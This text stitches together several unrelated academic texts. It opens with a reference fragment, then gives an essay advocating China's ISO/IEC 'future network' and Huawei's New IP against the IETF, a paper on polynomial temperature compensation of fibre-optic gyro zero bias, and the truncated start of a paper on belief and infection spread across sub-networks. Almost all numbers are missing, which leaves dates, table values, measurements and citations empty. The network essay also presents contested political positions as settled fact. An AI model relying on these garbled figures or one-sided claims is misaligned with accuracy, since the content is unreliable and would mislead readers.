taking human out of learning applications: a survey on automated machine learning. arxiv arxiv: . . zitzler e, deb k, thiele l. . comparison of multiobjective evolutionary algorithms: empirical results. evolutionary computation ( ): – doi . / . zitzler e, thiele l, laumanns m, fonseca cm, da fonseca vg. . performance assessment of multiobjective optimizers: an analysis and review. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . zoph b, le qv. . neural architecture search with reinforcement learning. arxiv arxiv: . . zoph b, vasudevan v, shlens j, le qv. . learning transferable architectures for scalable image recognition. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – .
international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- -

imperative to build network security system and speed up the future network construction

wu aiqun, vice director of the shanghai committee of economy of cppcc, president of the shanghai aerospace information technology research institute, vice president of the urban risk management research institute of tongji university
gao zhangxing, iso/iec future network standardization expert, science and technology consultant of nanjing future science technology city

abstract—network security is a comprehensive discipline involving computer science, network technology, communication technology, cryptography, information security technology, applied mathematics, number theory, information theory and other disciplines. network security protects the hardware, software and data in a network system from accidental or malicious damage, alteration and disclosure, so that the system runs continuously, reliably and normally and network services are not interrupted. although the market prospects for network security are very good, the structural defects of the internet are well known: during nearly years of rapid development of internet technology, the pioneers of the it industry focused on network flexibility and neglected network security, and only after heavy losses from large numbers of network attacks did network security technology (the maintenance of computer network systems, the inspection and repair of network vulnerabilities, and virus protection) become an urgent gap in information technology. state-organized, high-intensity network confrontation now poses a serious threat to all countries in the world. in such an environment, core technologies and key infrastructure can only be obtained through independent innovation: creating a new network system, and using a new architecture, new design, new technology, new resources, new standards and new applications to open up a new network space and build an independently controlled network security system with full sovereignty. it is therefore imperative to accelerate the development of the future network.

keywords-new architecture; new ip; new technology; new resources; new standard; new application

i. introduction
the idea of "reorganizing the architecture of the web" is not a new idea; it has been around for years. since , the international standardization organization iso/iec has been carrying out the future network standardization project for a new-architecture network system, and has set as the phased target for commercial use.
this paper based on the research and development experience of iso/iec future network international standard, it shows that network system innovation is the core benefit of the development of china's information and communication technology, and it is imperative! international journal of advanced network, monitoring and controls volume , no. , ii. the structural flaws of the internet are well known around the world china is no exception to the threat posed by state-level organized and high-intensity cyber confrontation to all countries in the world. in order to cope with state-level cyber confrontation, it is impossible not to change the situation that core technologies and key cyber infrastructure are in the hands of others. core technologies cannot be bought and critical infrastructure cannot be sought. the only possibility is to rely on independent innovation, opening up a new network system, with the new architecture, a new design, new technology, new resources, new standard and new application space to open up a new network, the network construction of new frontier has sovereign and independent control of network security system, set up national network defense system, and for the enterprise and society to build a is not subject to sanctions and cyber threat to the survival and development space of peace. this is how countries and nations survive in the age of cyber warfare. under the situation that the internet monopolizes the global information technology facilities, the proposal of the "new architecture network system" is bound to encounter opposition and obstruction from the internet vested interests. the statement on huawei newip by ietf, an american corporate standards agency, is a reflection of this. as the ancient saying goes, "each man is his own boss", which is a natural stance for the ietf. however, everything must have a reason. you can't object for the sake of objecting, you have to have a valid reason. judging by the ietf's claims, the argument is flimsy. the reason why huawei proposed the "new ip" proposal emphasizes the structural defects of the internet, and takes the -bit fixed-length address of the "next generation internet" as an example to illustrate that in many application scenarios, shorter address length is needed, and the structure of the internet does not meet the development needs of the society in the future. it has long been universally acknowledged that the internet is structurally flawed. even many documents in the united states government say a lot about it. for example, at the beginning of the internet design, it did not anticipate the tremendous changes and security threats brought by the development of science and technology decades later. it did not embed security into the architecture design, and many network security problems were caused by the structural defects of the internet. if you were to enumerate the structural flaws of the internet, the list could go on and on. taking 《 future network architecture and its security》 research report written by chinese academy of sciences in as an example, makes a comprehensive analysis of the defects of internet architecture from the perspective of security, and summarizes dozens of security architecture design requirements and solutions. taking the iso/iec international standard draft of 《 future network security architecture》 written by chinese experts as an example, there are technical indicators to be realized in the future network architecture design alone. 
these indicators correspond to the structural defects of the internet one by one. if you include structural defects in other technical areas such as naming, addressing, routing, infrastructure, economics, topology, management, and so on, there are hundreds of structural problems that need to be addressed. however, the study of the "new architecture of the network" has long since passed the stage of internet defect studies and feasibility studies. so there is no need to devote too much energy to responding to the ietf's objections. iii. the future of the internet leads the world in the past two decades, there have been two ideological trends in the development of the network international journal of advanced network, monitoring and controls volume , no. , technology system. one is the conservative approach stressed by internet vested interests such as isoc, icann, ietf and iana that "the structural integrity of the internet can only be maintained through gradual improvement". the biggest problem with this route is its inability to address structural flaws. patch the method of "overlapping", security holes emerge in endlessly. another trend of thought has emerged since the beginning of this century, advocating a new approach, using the "empty cup design" method, a new blueprint for network architecture on a piece of paper, through a new architecture design to fundamentally solve the security problem. from china's ministry of information industry to establish a decimal network standard working group ( ), to the national science foundation geni - find plan ( - ), to the future network international version of the iso/iec standardization project ( ), the itu -t working group ( - ), the future of the network, to the eu's "brad manifesto" ( ), the president of the united states national security telecommunications commission proposed "shot in the network security project" ( ), the brics calls chairman xi jinping, to speed up the construction of "the brics future network institute" ( ), and then to huawei, china mail tunnels institute, china unicom and china mobile "new ip" proposal, that a series of facts show that over the past two decades, the idea of network architecture reconstruction in china, the us, european and international standards organization has been a research hotspot and frontier technology in the field, has become an irresistible trend of the world. in this world trend, the internet standardization community will no longer hold a significant position. for future network (the future network, fn) as an example, the project is xi president called "the most authoritative international standardization organization" iso/iec organizations set up since , currently has more than a dozen published planning technical report (iso/iec tr series), and are working on the future network architecture and protocol standard system (iso/iec and series standard). as early as years ago ( ), a member of a national body had written to iso/iec, claiming that the internet standards were maintained by the ietf, and that the future network project violated the rights of the ietf, demanding that the project be stopped and withdrawn. on the basis of the position paper submitted by chinese experts to iso/iec, iso/iec adopted the resolution that the future network is a completely new network system, which is not related to the internet and does not fall within the scope of the authority of ietf, so there is no reason to stop or withdraw it. 
subsequently, the tr series of technical reports, led by chinese experts, received unanimous approval in a vote. iv. the new cyber architecture will not hinder global connectivity although the trend of reconstructing network architecture is irresistible, it still encounters great resistance and interference in the development process in the past. whether it is international or domestic, internet interest monopoly groups spread some wrong views through the media, misleading the decision-making and the public. if analyzed carefully, these views are all prejudices and fallacies, which simply cannot hold water. for example, there is the "fragmentation" view that the new architecture of the network will lead to the fragmentation of the internet and the "balkanization" of the internet. but this view is groundless. take the future network of iso/iec as an example. this is a brand new network system. it only considers the construction of its own system, but it will not touch the basic architecture and facilities of the internet. the relationship between the future network and the internet is like that between the new highway system and the old provincial and national highway system. international journal of advanced network, monitoring and controls volume , no. , the construction of new highways will not hinder the survival and passage of old roads. there is also a view that the new network will hinder globalisation and that countries will not be able to connect with each other. this, too, is a fallacy. take the iso/iec future network as an example. it is a project organized by an international standardization body and actively participated by many countries in the world. it fully conforms to wto norms and is recognized by the world. not only developing countries will support it, but many developed countries are also optimistic about the project. in , for example, the uk national committee submitted comments urging chinese experts to submit technical proposals for future web naming and addressing as soon as possible. a telecom expert from the national association of france led the proposal to help china promote the new future network technology program to african countries. so, as long as the new network has clever design and application space, other countries will not be able to use it. it is an unreasonable assumption without any basis that other countries will not use it. there is ample evidence of this both in the historical literature of the international standards of the future web and in the previous summit declarations of brics leaders. there is a claim that, a new architecture of the network system will make the network investment benefit of telecom enterprises in the past suffered this view also belong to prejudice again in the future network, for example, france telecom has an expert in iso/iec has repeatedly stressed that the future network to consider good protect telecommunications enterprise's investment in , chinese experts to the iso/iec submitted a technical literature, in china a decimal network technology solutions, for example, suggests that the future network to ensure that the new network architecture independent complete and advanced nature, can also with the existing network connectivity, can protect the existing network investment now that china unicom and china mobile have joined huawei's proposal, investment protection is no longer a concern. 
some people accuse china's independent innovation in the internet system of "shutting the door on the outside world" or "narrow gauge train". this is typical idle talk and scaremongering. take the future of the internet as an example. it is an international standard. how can it become a "closed door"? in the future, the network international standard will have guidance and priority for adoption all over the world. why is it a narrow-gauge train? the whole world has agreed on the future network planning scheme, almost all countries have the need for a new network architecture, how can it be impossible to gradually deploy and apply it globally? moreover, the future network has already been designed to be compatible with the existing network and can be quickly deployed. coupled with the advanced technology and full consideration of the application prospect, the future network has unlimited development potential. v. new architecture future network research and development in line with national policy guidelines in huawei's "new ip" proposal, it is clearly stated that this proposal belongs to the "future network" category. this enables huawei's proposal to be strongly supported by future domestic network technology accumulation and national policies. from the perspective of technology accumulation, china is the first country in the world to carry out the research on the new architecture network system. as early as the late s, china has started the pre-research and tackling of the new network system, and has made technological breakthroughs and obtained patent and copyright protection. in , the ministry of information industry of china set up the working group on decimal network standard, and soon promulgated the industry standard of "digital domain name specification" ( ). in , when the international journal of advanced network, monitoring and controls volume , no. , iso/iec jtc / sc xi'an plenary session considered a future network standardization project with an entirely new architecture, china voted in favor. in the following ten years, china's national members have contributed a lot of technical documents to the future international network standards. the international standards committee, the ministry of industry and information technology and the china institute of electronic standardization have held several meetings to promote the future network standardization, and the central leadership has issued important instructions on many occasions. china is a major contributor to the naming and addressing and security solutions in the future network core technology areas. china voted in favor of the future of internet international standards. therefore, it is the national position of the people's republic of china to establish a new architecture network system based on international standards. this position admits of no challenge. in terms of domestic policy, the chinese government has always attached great importance to the future research and development of network technology. as early as , the state council announced in document no. that the gradual improvement of the internet based on tcp/ip could no longer meet the needs, and that it was necessary to break through the basic theory of the future network, build future network experimental facilities, and incorporate the future network into the national medium - and long-term science and technology planning. 
in , after a year-long investigation, the chinese academy of sciences submitted a report to the state council recommending the establishment of major national projects to promote future network research and development with the will of the state. in , the general office of the cpc central committee, the general office of the state council, the cyberspace administration of the cpc central committee, the state standards commission, the ministry of science and technology, and the commission of science and technology of the central military commission all released documents listing the future network as one of the key technology areas that are "forward-looking, disruptive and killer" during the th five-year plan period. in , at the brics informal summit in osaka, japan, president xi jinping proposed to speed up practical projects such as the brics future network institute. in such a situation, our country's scientific research institutions should stay highly consistent with the party central committee and the state council; the propaganda departments and the mainstream media should likewise clearly defend and persevere in the position of network sovereignty, and should avoid becoming the mouthpiece of foreign internet interest monopoly groups seeking to preserve their outdated system, rather than working for the construction of a sovereign, new-architecture network system for our country's future. vi. it is urgent to rebuild the new system and accelerate its social and commercial application president xi jinping has always stressed that core technologies cannot simply be bought, and that we must adhere to independent innovation to change the situation in which core technologies in the information field are controlled by others. in his remarks during the cyber security publicity week, xi jinping called for equal emphasis on governance and innovation in cyber security. in his speech at davos , vice chairman wang mentioned innovation seven times. "we can only find ways to better divide the cake as we make it bigger," he said; "we cannot stop and argue endlessly about how to cut the cake. shifting the blame to others will not solve the problem." we no longer need to dwell on the rights and wrongs of the internet. instead, we should make full use of the strategic opportunity that international trends have brought for rebuilding the network system as new infrastructure, make the "cake" of a new-architecture network system bigger, establish a new cyberspace over which our country holds complete sovereignty, and then, with the strength of the whole nation, build this new cyberspace into a new world, a new frontier and a new haven that is free from cyber threats, rich in resources, safe for people to live and work in, and fit for the survival of future generations. this will be a great cause for the present and the future. using innovation to develop the network technology system is a sovereign state's right to survival and development, and no country has the right to interfere. the urgent task in advancing this cause is to accelerate the development of international standards for the future network. huawei's dispute with the ietf over "new ip" is further proof of the importance of international standards. we are developing a new architecture not just to protect ourselves, but to address the urgent need of people around the world for equal sovereignty and a secure network.
international standards are not only a platform for technical exchanges among countries on the new network technology system, but also a bridge by which china's future network system plan can lead research and development worldwide. although china has made proud achievements in this field, there is still much work to be done to form a complete system of future network technology standards. in particular, the future network security architecture, newly designed on the basis of the international standard scheme, is the key factor in the success or failure of the future network; it is the crown jewel of the future network. in this field china has achieved world-leading results, and more national resources are needed to integrate them into the future network international standard system. in an environment of increasingly fierce competition over network system international standards, enterprises will lose precious opportunities if they are left to face the "whole-of-government" competition from other countries on their own. at the same time, china should urgently promote the practical deployment of the new-architecture future network technology system. the expected time for commercial use of the future network international standard is . because our country started early in this domain, it already has the ability to invest and commercialize now. this preparation includes not only standards and equipment but also the design of application scenarios. the internet of things is the biggest application scenario of the future network. standards for the internet of things based on the new future network architecture were issued by the ministry of commerce and the ministry of industry and information technology in , and respectively. thanks to the latecomer's advantage, china's future-network-based internet of things technology is better suited to internet of things applications. from the perspective of social research, the need is very urgent and widespread. given the increasingly severe international situation and the increasingly imminent threat of cyber warfare, accelerating the deployment of china's autonomous and controllable future network is no longer one option among many, but a necessity. the spread of covid- in the us and europe has led to growing calls from western anti-china forces for china and the us to decouple, a trend that is bound to spread to the cyber sector. we need to consider the question: what if the network decouples? are we ready? this is a problem that not only huawei will face, but a difficult problem that people all over the country cannot avoid. vii. conclusion the "structural flaws in the internet" identified by huawei in its "new ip" international standard proposal are a universally recognized fact that cannot be changed even if the ietf denies it. the proposal was submitted to the international standards organization; if the ietf has comments, it can submit them to the international institutions through its national membership. huawei's idea and proposition of "rebuilding the network architecture" fully conform to the position of the iso/iec future network international standards, which has been repeatedly demonstrated over many years, and its rationality and feasibility have been unanimously approved by the international community. the ietf's position reflects its desire to protect the interests of the internet, but whether it meets the needs of people around the world needs to be evaluated and considered in the international standards bodies.
the iso/iec one-country-one-vote decision-making mechanism is the best mechanism to ensure the sovereign equality of all countries and fairness in the world. the route of "rebuilding the network security architecture" represented by the iso/iec future network international standard has become the trend of the world; it represents the most important field and direction for the future development of information and communication technology and has reached the stage of commercial construction. the future network is a frontier technology field to which the chinese government attaches great importance. its technical scheme has been recognized by the world and has broad application prospects worldwide. the future network will be self-contained and will not have to rely on the existing network infrastructure for support; at the same time, for rapid deployment and application, it is designed with a compatibility mechanism toward the existing network. it will not affect the structural stability of the internet, will not push the internet toward fragmentation, will not endanger the existing investments of telecom enterprises, and will not lead to a "closed door" or "narrow-gauge train" phenomenon. the future network also possesses new core resources of great industrial value, which can drive enormous social and economic value and open up space for industrial development. "it takes ten years to sharpen a sword." our country has worked on the future network for some twenty years, and in theoretical study, top-level design, international standards, system schemes, security architecture, autonomous control, core equipment, sovereign legislation, offensive and defensive drills, strategic planning and so on it has mature solutions and ready, available equipment systems; it can be said that everything is prepared and all that is wanting is, as the saying goes, the east wind. the investment of huawei and other organizations indicates that the future network is on the fast track of development. at present the international situation is very serious, and the threat of national-level cyber confrontation and cyber warfare is increasingly imminent; it is an urgent task to strengthen the construction of the national network security defense system with the new-architecture future network technology system. in the past there have long been differences over the development path of the network system, but there is a growing consensus to rely on the new network architecture to strengthen national cyber security. we should seize the opportunity, give priority to the interests of the state and the nation, set aside past grievances, unite all forces that can be united, form the broadest possible united front, and accelerate future network standardization with the new architecture and its social and practical deployment. about the author wu aiqun: deputy director of the economy committee of the shanghai cppcc committee, president of the shanghai academy of aerospace information technology, and vice president, professor and doctoral supervisor of the urban risk management institute of tongji university. gao zhangxing: iso/iec future network standardization expert, science and technology consultant of nanjing future science and technology city. editor in charge: yang yining
international conference on sensor network and computer engineering (icsnce ) analysis and compensation about temperature influence to optical-fiber gyro zero bias zhou haiyuan, yang heng, wang qianxue, liu xinming and pan liang china satellite maritime tracking & controlling department jiangyin, , china e-mail: @qq.com abstract—compared with other gyros, the optical-fiber gyro offers better dynamic performance at a lower price and is well suited to building a strapdown inertial navigation system (sins). however, the zero bias of the optical-fiber gyro is sensitive to temperature, and its compensation is a hot topic in ins research. accordingly, taking one type of optical-fiber gyro as the object, the mechanism by which temperature influences the gyro zero bias was studied, a test method was designed, the experimental results were analyzed, and finally a compensation mathematical model based on polynomial (multinomial) fitting was established. the research shows that temperature has a large influence on the optical-fiber gyro zero bias and that this influence can be corrected by the polynomial-fitting compensation model. keywords-multinomial simulation; gyro zero bias; temperature characteristic; temperature compensation; temperature sensor i. introduction the gyro is the core component of inertial navigation equipment and the key factor determining the position and attitude accuracy of that equipment. at present, the traditional liquid lifting gyro has entered a period of technical stability and its accuracy is difficult to improve further; laser gyro technology is also basically mature and has entered the stage of engineering application. compared with the liquid lifting gyro, the optical-fiber gyro has the advantages of simple structure, fast start-up, long service life, small volume and so on; compared with the laser gyro, it offers a lower price and higher dynamic performance, so the optical-fiber gyro is more suitable for constructing a strapdown inertial system. temperature is one of the main factors affecting the performance of the optical-fiber gyro[ - ]: because its optical elements are temperature sensitive, a temperature change causes the gyro to deviate from its original state, which affects the output accuracy of the system. compensating the optical-fiber gyro zero bias caused by temperature change is therefore a most important problem to be solved for inertial navigation equipment based on optical-fiber gyros. ii. influence of temperature on zero bias of optical-fiber gyro a. experimental design the optical-fiber gyro used in this experiment is an advanced high-precision type, with required performance indices of zero bias stability better than . º/h and scale factor stability better than ppm. the test hardware consists of a temperature-controlled turntable and supporting facilities, configured as follows: 1) temperature-controlled turntable: the temperature range is between - ℃ and + ℃; the output range is . º/s to º/s; the rate stability is × - ; and the temperature stability is ± . ℃. 2) matching test facilities: a vibration-isolated foundation avoids interference from external vibration during the test.
the data acquisition device was used to collect the gyro data, and the turntable control computer was used to control the turntable and record the gyro data. fig. shows the connection diagram of the temperature test equipment. the temperature sensors were located at the top and the side of the gyro shell to record the ambient temperature. after the gyro was started, the output of the gyro and the readings of the temperature sensors were collected, sampled times per second. figure . equipment connection for the temperature test (testing turntable, fiber optic gyro, temperature sensors, data acquisition and processing system, and control computer). b. test result in order to test the temperature characteristics of the optical-fiber gyro, a total of fixed-temperature gyro zero bias tests were arranged according to the experimental scheme. experiments were conducted at each fixed temperature, and the results of one experiment are shown in table . table i. gyro zero bias results at different temperatures. columns: serial number, time length (s), temperature (℃), gyro zero bias mean value (º/h), gyro zero bias standard deviation (º/h), and gyro zero bias standard deviation after -point moving smoothing (º/h). c. data analysis according to the data in table , take the serial number test as an example: the sensor temperature was . ℃, the mean gyro zero bias was . º/h, and the standard deviation was . º/h, which shows that the gyro noise is random (random walk). after a -point moving-average smoothing of the gyro zero bias, the standard deviation was reduced to . º/h; after smoothing, the standard deviation is obviously smaller. comparing the sets of data, it can be found that temperature has a large influence on the mean gyro zero bias: the fifth test group, at a temperature of . ℃, gave the minimum output of . º/h, while the fourth group, at . ℃, gave the maximum output of . º/h; the relative error was . % and the absolute error was . º/h. the effect of temperature on the optical-fiber gyro zero bias must therefore be corrected by compensation. iii. modeling of zero bias compensation according to the ieee definition of the temperature drift of an optical-fiber gyro, temperature change is an important factor affecting the precision of the optical-fiber gyro zero bias[ - ]; the effect of temperature on the zero bias appears mainly in three aspects: temperature, temperature change rate and temperature gradient. based on these three factors, the temperature drift of the gyro can be fitted by a polynomial model of the following form: l - l_0 = \sum_{i=1}^{q} a_i t^i + \sum_{j=1}^{m} b_j (dt/dt)^j + \sum_{k=1}^{n} c_k (\Delta t)^k (1) where l is the gyro output, unit º/h; l_0 is the zero bias output obtained from the first two minutes of sampling after the gyro is started, unit º/h; t is the temperature sensed by the gyro, unit ℃; Δt is the temperature gradient of the gyro, unit ℃; dt/dt is the temperature change rate of the gyro, unit ℃/s; a_i, b_j and c_k are polynomial coefficients; and q, m and n are the highest powers of the corresponding temperature factors. the coefficients a_i, b_j and c_k of the model polynomial were fitted by regression analysis and the least-squares method.
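the fitting step can be illustrated with a brief numerical sketch. the code below is not the authors' software but a minimal reconstruction under stated assumptions: the sample arrays t, dtdt and dgrad for the three temperature factors, the output l, the initial zero bias l0 and the default model orders q, m and n are all hypothetical placeholders, and the coefficients of formula (1) are estimated with numpy least squares.

```python
# illustrative sketch of fitting the temperature-drift model of formula (1):
#   l - l0 = sum_i a_i*t**i + sum_j b_j*(dt/dt)**j + sum_k c_k*(delta_t)**k
# array names, default model orders and all data values are assumptions.
import numpy as np

def design_matrix(t, dtdt, dgrad, q=2, m=1, n=1):
    """regressor columns for the three temperature factors (numpy 1-d arrays)."""
    cols = [t ** i for i in range(1, q + 1)]          # temperature powers
    cols += [dtdt ** j for j in range(1, m + 1)]      # temperature change rate powers
    cols += [dgrad ** k for k in range(1, n + 1)]     # temperature gradient powers
    return np.column_stack(cols)

def fit_drift(t, dtdt, dgrad, l, l0, q=2, m=1, n=1):
    """least-squares estimate of the coefficients [a_1..a_q, b_1..b_m, c_1..c_n]."""
    X = design_matrix(t, dtdt, dgrad, q, m, n)
    coeffs, *_ = np.linalg.lstsq(X, l - l0, rcond=None)
    return coeffs

def compensate(t, dtdt, dgrad, l, coeffs, q=2, m=1, n=1):
    """subtract the estimated temperature-induced drift from the gyro output."""
    return l - design_matrix(t, dtdt, dgrad, q, m, n) @ coeffs
```

on real test data the fitted coefficients would then be stored in the test software and re-evaluated from the measured start temperature, as the following paragraph describes for formula (3).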
the polynomial model can be written in matrix form as: l - l_0 = t a (2) where, for n data samples and a model of order q, t is the n × q temperature matrix whose i-th row is (t_i, t_i^2, …, t_i^q) and a = (a_1, a_2, …, a_q)^T is the coefficient vector; q is the order of the temperature drift model, t is the temperature matrix, and n is the number of gyro temperature-drift data points. the coefficients fitted at different temperatures are different. the coefficients a_i, b_j and c_k satisfy a relation of the form: a_i = a_{i0} + a_{i1} t_0 + a_{i2} t_0^2 + a_{i3} t_0^3, i = 1, …, q (3) where t_0 is the start temperature. the coefficients a_{ij} (i = 1, …, q; j = 0, 1, 2, 3) were obtained by least-squares calculation for each gyro at different temperatures and solidified in the computer test software. as long as the initial temperature t_0 of the gyro is measured after the gyro is started, the coefficients in the model can be calculated according to formula (3); then, according to the temperature factors, the zero bias compensation of the current gyro is estimated with the polynomial model of formula (1), and the estimated zero bias caused by temperature can be calculated and removed. iv. optical-fiber gyro zero bias characteristics compensation result the influence of temperature on the zero bias appears mainly in three aspects: temperature, temperature change rate and temperature gradient[ - ]. for a comprehensive analysis of the temperature character of the optical-fiber gyro zero bias, the effects of temperature, temperature change rate and temperature gradient were all compensated: temperature was compensated up to order , the temperature change rate to order , and the temperature gradient to order . a. temperature compensation results using the data in table , polynomials of each order were fitted to the dependence of the gyro zero bias on temperature, with the result shown in figure . according to the fitting results, the gyro zero bias data were compensated for a continuous change of temperature from - ℃ to ℃ as in fig. ; the and order compensation results are shown in figure , and the comparison of the results of each order of compensation is shown in table . figure . polynomial fitting curves (linear to higher order) of the gyro zero bias caused by temperature. figure . the influence of temperature on the gyro zero bias (smoothed gyro output versus gyro temperature sensor reading). figure . gyro output after polynomial compensation of different orders during temperature transition (original output, smoothed output, compensated output, and temperature). table ii. gyro output under polynomial compensation of each order during temperature transition. columns: compensation method (none, linear, and higher orders), gyro zero bias mean value (º/h), and gyro zero bias standard deviation (º/h). from table it can be seen that the standard deviation of the gyro zero bias is smaller after compensation, and that the second-order polynomial compensation is the best. b. compensation result of temperature gradient change the relationship between the temperature gradient and the gyro zero bias is shown in figure .
figure . relationship between the temperature gradient and the gyro zero bias (gyro output and temperature gradient versus the gyro temperature sensor reading). on the basis of the temperature compensation, temperature gradient compensation was added to the zero bias; the resulting zero bias standard deviations are shown in table . table iii. results after adding temperature gradient compensation. columns: compensation method (none, linear, and higher orders), gyro zero bias mean value (º/h), and gyro zero bias standard deviation (º/h). according to the data in table , at the same order the results improve obviously after adding the temperature gradient compensation, and the second-order polynomial compensation is the best: the standard deviation is reduced to / of the original value. c. compensation result of temperature change rate in figure , the difference between each data point and the average value reflects, to a certain extent, the influence of the temperature change rate on the gyro zero bias. on the basis of the temperature and temperature gradient terms, the influence of the temperature change rate on the gyro zero bias was also added. the and order fitting results are shown in fig. , and the comparison of the results of each order of compensation is shown in table . figure . gyro output after polynomial compensation for temperature transition, temperature gradient and temperature transition rate (original data and compensated output). table iv. compensation results after temperature transition, temperature gradient and temperature transition rate. columns: compensation method (none, linear, and higher orders), gyro zero bias mean value (º/h), and gyro zero bias standard deviation (º/h). from table and the figure it can be seen that the "fourth-order polynomial + temperature gradient + temperature change rate" compensation is effective: the gyro zero bias standard deviation can be reduced to / of its original value by the fitting, so the compensation effect is obvious. v. conclusion temperature is one of the most important factors affecting the zero bias of the optical-fiber gyro. the temperature characteristics of the optical-fiber gyro have to be studied, and the zero bias caused by temperature changes must be compensated, if the optical-fiber gyro is to be used in engineering applications. based on an analysis of the working principle of the optical-fiber gyro and of the mechanism by which temperature influences the zero bias, a temperature test of the optical-fiber gyro was carried out, a zero bias compensation method was studied, and the compensation effect was analyzed with the experimental data. the experimental results show that the influence of temperature on the zero bias of the optical-fiber gyro is effectively reduced by the polynomial (multinomial) fitting method, which compensates for the three aspects of temperature, temperature gradient and temperature change rate. references [ ] han bin, lin yu-rong, deng zheng-long. overview on modeling and compensation of fog temperature drift[j]. journal of chinese inertial technology, , ( ): - . [ ] xu hong-jie, zhang wen-yan, xu xiaobin, et al. research on thermal induced non-reciprocity in optical-fiber gyro with double optical length[j]. acta photonica sinica, , ( ): - . [ ] yu xuhui, ma huilian, jin zhonghe, et al.
improving thermal stability of a resonator optical-fiber gyro employing a polarizing resonator[j]. optics express, , ( ): - . [ ] lefèvre h c. the fiber-optic gyro: achievement and perspective[j]. gyroscopy and navigation, , ( ): - . [ ] dusan agrez. improving phase estimation with leakage minimization[j]. ieee trans on im, , ( ): - . [ ] liu ying, xu jin-tao, wang min-juan. analysis and compensation of the temperature field inside fiber optic coil[j]. journal of xi'an university of posts and telecommunications, , ( ): - . [ ] liu jie-yu, yu zhi-yong, ma xue-wen. modeling and compensation of static temperature error synthetically for optical-fiber gyro[j]. acta optica sinica, , ( ): - . [ ] zhang yan-ping, pan zi-jun, wei zhi-wu, et al. hardware implementation of temperature compensation for fog's scale-factor[j]. journal of chinese inertial technology, , ( ): - . what you believe travels differently: information and infection dynamics across sub-networks abstract: in order to understand the transmission of a disease across a population we will have to understand not only the dynamics of contact infection but the transfer of health-care beliefs and resulting health-care behaviors across that population. this paper is a first step in that direction, focusing on the contrasting role of linkage or isolation between sub-networks in (a) contact infection and (b) belief transfer. using both analytical tools and agent-based simulations we show that it is the structure of a network that is primary for predicting contact infection—whether the networks or sub-networks at issue are distributed ring networks or total networks (hubs, wheels, small world, random, or scale-free, for example). measured in terms of time to total infection, degree of linkage between sub-networks plays a minor role. the case of belief is importantly different. using a simplified model of belief reinforcement, and measuring belief transfer in terms of time to community consensus, we show that degree of linkage between sub-networks plays a major role in social communication of beliefs. here, in contrast to the case of contact infection, network type turns out to be of relatively minor importance. what you believe travels differently. in a final section we show that the pattern of belief transfer exhibits a classic power law regardless of the type of network involved. authors: patrick grim is distinguished teaching professor of philosophy at stony brook, co-author of the philosophical computer (mit ) and beyond sets (ontos/verlag ). grim's publications appear not only in philosophy but in computer science, theoretical biology, cognitive science, linguistics, and game theory. christopher reade is a consultant at thoughtworks inc. and a graduate of the gerald r. ford school of public policy at the university of michigan. steven fisher is an undergraduate in complex systems studying networks and network theory in the center for the study of complex systems at the university of michigan. daniel j. singer is a ph.d. candidate in philosophy at the university of michigan working on foundational questions of epistemology and formal epistemology. dr. stephen majewicz is an associate professor in mathematics at kingsborough community college. his fields of interest include nilpotent groups, exponential a-groups and nilpotent r-powered groups, combinatorial group theory, and axiomatic set theory.
acknowledgements: this work was supported in part by the national institute of general medical sciences midas grant u gm - , computational models of infectious disease threats, and by a pilot grant for developing an agent-based model to assess racial differences in medical discrimination, social support and trust, administered by the graduate school for public health at the university of pittsburgh. please contact patrick grim for correspondence at pgrim@notes.cc.sunysb.edu patrick grim department of philosophy, stony brook university stony brook, ny, usa christopher reade gerald r. ford school of public policy, university of michigan ann arbor, mi, usa daniel j. singer department of philosophy, university of michigan, ann arbor, mi, usa steven fisher center for study of complex systems, university of michigan ann arbor, mi, usa stephen majewicz department of mathematics, kingsborough community college brooklyn, ny, usa introduction public health has been a primary target for agent-based and network modeling. a significant amount of work has been done on the role of network structure in the spread of disease (meyers, pourbohloul, newman, skowronski & brunham ; keeling ; ferrari, bansal, meyers & bjørnstad ; miller & hyman ; eubank, guclu, kumar, marathe, srinivasan, toroczkai & wang ). but it is clear that health-care behaviors are as crucial in the pattern of any pandemic as are the biological characteristics of the pathogens involved (epstein, parker, cummings & hammond ; auld ; del valle, hethcote, hyman, & castillo-chavez ; barrett, bisset, leidig, marathe, & marathe ; funk, gilad, watkins, & jansen ; hallett, gregson, lewis, lopman, & garnett ). those health- care behaviors are contingent on beliefs. on standard models, these include at least beliefs regarding severity, susceptibility, effectiveness and the cost of preventive measures (harrison, mullen, & green ; janz & becker, ; mullen, hersey, & iverson ; strecher & rosenstock ). in order to understand the spread of disease we will have to better understand the spread of beliefs and behaviors. moreover, as public health interventions are often targeted to beliefs and behaviors we will have to better understand the spread of beliefs and behaviors in order to intervene effectively. for a better picture ofdisease dynamics and to better the prospects for effective intervention we need a better understanding of the dynamics of belief transmission across social networks. although important empirical work has been done on social networks and the diffusion of beliefs and behaviors (valente , ; morris, podhisita, wawer & handcock ; morris ; valente & davis, ; kincaid ; hamilton, handcock & morris ), significantly less has been done with the tools of agent-based modeling toward understanding the abstract dynamics of belief (see however centola & macy and golub & jackson, forthcoming). in what follows we take some steps in that direction, with an emphasis on the pervasive social phenomenon of sub-network groups or clusters. our social networks do not form a uniform and homogenous web. social communities are composed of sub- communities, with varying degrees of contact and isolation between them; both in terms of the physical contact necessary for disease transmission and the informational contact crucial to the transmission of belief. racial, ethnic, socio-economic, demographic, and geographical sub-communities offer a clear example. 
racial and economic sub- communities may be more or less isolated or integrated with other sub-communities, with varying strengths of information transfer, communication, and trust. in the case of a pandemic, degree of isolation or integration will be crucial in predicting the course of contact and therefore the dynamics of disease transmission. but in such a case degree of informational isolation or integration will also be crucial in tracking changes in health care beliefs and behaviors, with both immediate and long-range effects on the course of the disease. what we offer is an abstract model of this very real phenomenon. we track the role of degree of linkage between sub-networks in the transfer of disease and the transfer of information, with contrasting results in the two cases. linkages between sub-networks have also been termed 'bridges,' analogous to a concept of bridges in centola and may consider 'complex contagions', in which more than one neighbor is required for infection. this is not strictly speaking a reinforcement effect, but does show dynamics similar to that studied for belief reinforcement here—and a similar contrast with simple infection. golub and jackson outline analytic results on 'homophily' in random networks, with a similar emphasis on the contrast between diffusion and belief averaging. our work here, part analytic and part from agent-based simulations, extends that work and shows that the central contrast holds across networks of various types. computer networking and identified in trotter, rothenberg and coyle ( ) as a key area for future work in network studies and health care. l. c. freeman ( ) speaks of degree of linkage in terms of segregation and integration between sub-networks. ours is a formal study of networks, however, and such a terminology may carry distracting connotations. homophilous networks, in which nodes link preferentially 